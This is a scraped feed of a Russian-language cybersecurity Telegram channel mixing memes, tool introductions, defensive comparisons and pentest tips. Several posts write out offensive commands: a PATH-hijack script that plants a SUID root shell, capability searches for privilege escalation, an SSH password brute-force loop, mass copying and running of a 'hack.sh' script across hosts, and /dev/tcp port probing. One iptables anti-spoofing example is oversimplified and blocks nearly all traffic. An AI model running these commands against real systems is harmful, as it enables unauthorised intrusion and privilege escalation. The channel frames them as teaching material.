ZeroDay | Кибербезопасность – Telegram
ZeroDay | Кибербезопасность
43.1K subscribers
630 photos
7 videos
8 files
825 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
«Если ты знаешь сеть и знаешь себя, тебе не страшны результаты сотни окон обслуживания.»

Искусство WAN
Сунь-Цзы (наверное)

ZeroDay | #мем
32😁17👍2💯1
Deep-dive, или когда обновиться недостаточно

Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.

В статье будет краткий чек-лист Deep-dive: верификация SCA, поиск первоисточников, оценка эксплуатируемости и практические обходы (конфиги, мониторинг, тестовая эксплуатация). Кейсы на Spring/Struts и Python показывают, как решать прям на практике.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41🏆1
😁60🤣172🔥2💯2
MyIP: универсальный чекер IP и сетевых связей

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

MyIP - универсальный «чекер» всего, что связано с твоим IP: геолокация, DNS- и WebRTC-утечки, доступность сайтов, speed test, MTR и whois. Короче все в одном месте, без беготни по десятку сервисов.

Можно быстро проверить пинг до серверов по миру, доступность популярных сайтов и получить полную инфу по любому IPшнику.

Смотрим локально:

git clone https://github.com/jason5ng32/MyIP.git
cd MyIP
npm install && npm run build
npm start


Или одной командой через Docker:

docker run -d -p 18966:18966 --name myip jason5ng32/myip:latest


И финально, что еще есть классного: PWA, мобильный режим, тёмная тема, хоткеи и встроенный чек-лист по кибербезу даже 😎

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
12🤡5👍3❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
DLP vs CASB: что выбрать?

👋 Приветствую в мире цифровой безопасности!

Разберем, что выбрать для защиты от утечек данных — DLP или CASB.

DLP (Data Loss Prevention) - это как внутренний «охранник» компании. Следит, чтобы важные данные не улетели наружу: почта, флешки, копирование файлов. Помогает предотвратить случайные утечки или намеренные кражи инфы внутри компании. Главное, что DLP отлично работает внутри корпоративной сети, но с облачными сервисами и SaaS ограничений больше.

CASB (Cloud Access Security Broker) — такой «страж» облака. Контролирует доступ к SaaS, проверяет трафик, шифрует данные, ловит подозрительные действия и блокирует непонятные подключения. Он ориентирован на облачные сервисы, поэтому локальные файлы и устройства под его зоной действия не всегда.

ZeroDay | #CASB #DLP
Please open Telegram to view this post
VIEW IN TELEGRAM
7❤‍🔥3👌2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


Linux capabilities вместо SUID: SUID-бинарники - это старый трюк, но современные админы иногда забывают про capabilities.

getcap -r / 2>/dev/null


➡️ Видите cap_net_admin или cap_setuid+ep? Вот теперь можно изучить бинарь и поднять права. Защита проста: убрать лишние capabilities и мониторить их появление.

PATH-hijack через cron или systemd: Если сервис запускает команды без полного пути — подкиньте свой бинар в каталог, который стоит раньше в PATH:

echo -e '#!/bin/bash\ncp /bin/sh /tmp/rootsh && chmod +s /tmp/rootsh' > /tmp/backup
chmod +x /tmp/backup
export PATH=/tmp:$PATH


➡️ Защита: жёсткий PATH и абсолютные пути в unit-файлах и crontab, запрет на запись в системные каталоги.

SSH-agent forwarding & ProxyCommand для тихого pivot: Агент на цели может быть вашим тайным оружием: ключи остаются у вас, а доступ дальше можно получить через ProxyCommand/ProxyJump.

ssh-add -L   # покажет ключи агента


➡️ Защита: отключать агент-форвардинг (AllowAgentForwarding no) и следить за нестандартным SSH-трафиком.

ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍65❤‍🔥1
📝 Типы спуфинг атак по уровням OSI

Прикладной уровень (Layer 7): Здесь обман чаще всего идёт напрямую на вас. Хакеры подменяют адреса сайтов, чтобы вы случайно оказались на фейковой странице. Они могут отправлять письма, выдаваясь за знакомых или оф службы.

Представительский уровень (Layer 6): уровень занимается форматами и кодировками - и именно тут умельцы маскируют вредоносные файлы под безопасные. Они могут подменять содержимое страниц и хитро обходить проверки, меняя кодировки символов.

Сеансовый уровень (Layer 5): Атаки на этом уровне - это уже про захват или подделку сессий. Хакеры перехватывают защищённые соединения с помощью поддельных сертификатов, повторно используют ваши сессионные ключи или заставляют устройство пользоваться заранее подготовленными идентификаторами.

Транспортный уровень (Layer 4): Здесь пытаются вмешаться в уже установленное соединение. Это может быть внедрение вредоносных данных в TCP-сессии, отправка команд для разрыва связи или создание нагрузки.

Сетевой уровень (Layer 3): Здесь начинается подмена адресов и маршрутов. Хакеры отправляют пакеты с чужими IP-адресами, чтобы скрыть себя, подменяют маршруты, чтобы перехватывать трафик, и вводят ложные данные о маршрутизации, направляя трафик через себя.

Канальный уровень (Layer 2): В локальной сети хакеры подменяют MAC-адреса и даже создают фейковые устройства. Они отправляют поддельные ARP-ответы, маскируются под чужие MAC, запускают ложные Wi-Fi точки доступа.

ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
👍195
Бюджет на безопасность в моей компании:

ZeroDay | #мем
😁536😭4
Криптопаразиты-снайперы: грабь награбленное‽

Биткоин-головоломки с «легкими» BTC казались простым выигрышем, пока не появились криптопаразиты, то есть хакеры, которые перебивают транзакции и забирают приз себе. Механика тут проста: транзакция раскрывает публичный ключ, а слабые кошельки позволяют быстро вычислить приватный и отправить свою транзакцию с более высокой комиссией.

В статье у нас краткий разбор: как перебивают транзакции, ускоряют ставки, используют PoC и тестовые скрипты, чтобы забрать награбленное. Кейсы на 6.6–6.9 BTC показывают, как паразиты действуют быстрее обычного юзера и почему нужно быть осторожным с «легкими» головоломками.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍1
Что обычно используется для «pivoting» при внутреннем тестировании в разрешённой среде?
Anonymous Quiz
16%
Открытые SMB-шеры
48%
SSH/Socks прокси через скомпрометированный хост
18%
Подмена ARP на границе сети
18%
Смена VLAN без доступа к коммутатору
🔥12👍31
afrog: сканер, который ускоряет пентест

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Что это: afrog - быстрый и стабильный сканер на Go. Пробегает встроенные PoC: CVE, CNVD, default-пароли, info-leak, RCE, arbitrary file read и многое другое. Можно добавлять свои PoC, а результаты сразу превращаются в аккуратный HTML-отчёт.

В чем удобство: мало ложных срабатываний, легко масштабируется на десятки сайтов, поддерживает фильтры по ключевым словам и уровню критичности, плюс JSON для CI/CD.

Глянем на практике:

git clone https://github.com/zan8in/afrog.git
cd afrog
go build cmd/afrog/main.go
./afrog -h


Скан одного сайта:

./afrog -t https://example.com


Скан по списку:

./afrog -T urls.txt


Полезные флаги:
• -P <mypocs/> — свои PoC
• -s keyword1,keyword2 — поиск по ключевым словам
• -S high,critical — фильтр по серьёзности
• -json / -json-all — сохранить результаты в JSON
• -web — локальный веб-интерфейс для просмотра отчётов

Для сложных PoC: некоторые проверки требуют OOB (ceye, dnslog и др.). Первый запуск создаёт ~/.config/afrog/afrog-config.yaml — настройте секцию reverse и API ключи, чтобы все blind-RCE работали корректно.

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍2
📝 Как убить процессы в Linux

ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤨3👍1💘1
IP Spoofing: защита на сетевом уровне (Layer 3)

👋 Приветствую в мире цифровой безопасности!

В одном из прошлых
постов разбирали типы спуфинг атак по уровням. Сейчас посмотрим, как защититься от одной из них.

Смысл атаки: хакер подменяет IP-адрес источника в пакетах, чтобы скрыть своё местоположение, обойти фильтры или направить трафик на жертву. Это классика для DDoS, MITM и обхода контроля доступа.

Покажу на практике:

1️⃣Ingress/Egress Filtering: фильтруем пакеты на границах сети, чтобы трафик с «чужим» исходным IP просто не проходил.

Cisco:

interface GigabitEthernet0/1
ip verify unicast source reachable-via rx


Linux (iptables):

iptables -A INPUT -s 192.168.0.0/16 -j ACCEPT
iptables -A INPUT -s 0.0.0.0/0 -j DROP


2️⃣Reverse Path Filtering (uRPF): проверяем, что пакет пришёл по корректному маршруту. Если нет - DROP.

Linux:

echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter


3️⃣Точечный мониторинг и alert-правила: следим за подозрительными исходящими пакетами. Даже если атака идёт изнутри сети, IDS сможет поднять тревогу. Например, Suricata правило:

alert ip any any -> 192.168.0.0/16 any (msg:"Suspicious spoofed packet"; sid:100001;)


ZeroDay | #Zeroday
Please open Telegram to view this post
VIEW IN TELEGRAM
👍74
Какой метод атаки позволяет обойти DEP и ASLR, используя цепочки существующих инструкций в памяти?
Anonymous Quiz
26%
Heap Spraying
51%
Return-Oriented Programming (ROP)
15%
SQL Injection
9%
XSS
😢3
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для автоматизации атак

👋 Приветствую в мире цифровой безопасности!

Давай расскажу о 5 фишках Bash, которые заметно ускорят пентест.


Массовый пинг сети: Бывает, нет под рукой nmap, а нужно быстро понять, какие машины живы в подсети. Поможет простой цикл:

for ip in 192.168.1.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip жив"; done


Одной строкой получаем список активных хостов.

Проверка открытых портов без nmap: То же самое можно сделать и с портами:

for p in 22 80 443 3306; do (echo >/dev/tcp/192.168.1.10/$p) &>/dev/null && echo "порт $p открыт"; done


Автоподбор паролей через SSH: Мини-брут без Hydra - иногда работает на тестовых стендах:

while read p; do sshpass -p "$p" ssh -o StrictHostKeyChecking=no user@host "echo успех с $p" && break; done < passlist.txt


Заливка скрипта на все машины: Рутинные действия можно автоматизировать одним циклом:

for h in $(cat hosts.txt); do scp hack.sh $h:/tmp/; ssh $h "bash /tmp/hack.sh"; done


Так можно массово прогнать свой скрипт по списку хостов.

Сбор инфы с машин: Чтобы не заходить на каждый сервер отдельно:

for h in $(cat hosts.txt); do echo "== $h =="; ssh $h "id; uname -a; df -h"; done


ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
18👍6🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
EDR vs NDR: что выбрать и как их совместить?

👋 Приветствую в мире цифровой безопасности!

Расскажу, чем отличаются EDR и NDR. И можно ли их юзать совместно.

EDR (Endpoint Detection and Response) - можно сказать, что это, как охранник на каждом компьютере или сервере. Он фиксирует непонятные процессы, аномалии в поведении приложений и сразу реагирует. Можно юзать против локальных атак и вредоносов.

NDR (Network Detection and Response) - тут уже что-то вроде шпиона внутри сети. Он анализирует трафик, ищет аномальные соединения, подозрительные паттерны протоколов и нестандартное поведение, даже если конечные точки чистые.

Но лучше их комбинировать: EDR быстро блочит локальные угрозы, NDR ловит скрытые сетевые атаки и нетривиальные попытки обхода. Вместе они дают полный обзор и ускоряют расследование инцидентов.

ZeroDay | #EDR #NDR
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍3🌭1
📝 Ловите небольшую шпаргалку для Kali Linux

ZeroDay | #Kalilinux
Please open Telegram to view this post
VIEW IN TELEGRAM
19👍7🔥3🌭2😁1👨‍💻1
Ох уж эти Алиса, Боб и Чарли….

ZeroDay | #мем
35🤣16
😁78👍127❤‍🔥2💋1
Isolation Forest: как находить аномалии в данных

Аномалии - это не всегда очевидные выбросы: глобальные (резко отличающиеся точки), контекстные (необычные сочетания признаков) и коллективные (группы «нормальных» точек с аномальным паттерном). Isolation Forest ловит такие выбросы, создавая ансамбль деревьев и «изолируя» редкие наблюдения; каждая случайная выборка учится выявлять аномалии, а объединение моделей повышает точность.

В статье будет очень наглядное объяснение типов аномалий и как ансамбли деревьев Isolation Forest помогают их обнаружить, с примерами глобальных, контекстных и коллективных выбросов.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍127👨‍💻3
dirsearch: сканер скрытых путей

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

dirsearch - такой быстрый web path scanner, который помогает находить спрятанные директории и файлы на сайтах.

dirsearch брутфорсит пути по словарю и проверяет их доступность. Так можно найти забытые админки, бэкапы или тестовые файлы.

Что умеет: поддержка wordlist’ов, маскировка расширений (-e php,html,js), рекурсивное сканирование (-r), фильтрация по статусам и даже обход лимитов через прокси или Tor.

Как работает:

# стандартный запуск
python3 dirsearch.py -u https://target -e php,html,js -w /path/to/wordlist -r -t 30

# скан с сохранением в отчёт (HTML)
python3 dirsearch.py -u https://target -w /path/to/wordlist --format=html -o report.html

# запуск через прокси
python3 dirsearch.py -u https://target -w /path/to/wordlist --proxy=http://127.0.0.1:8080

# ограничение по коду ответа (например, только 200)
python3 dirsearch.py -u https://target -w /path/to/wordlist --include-status=200


Результат, кстати, можно выгрузить в json, html или csv.

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚75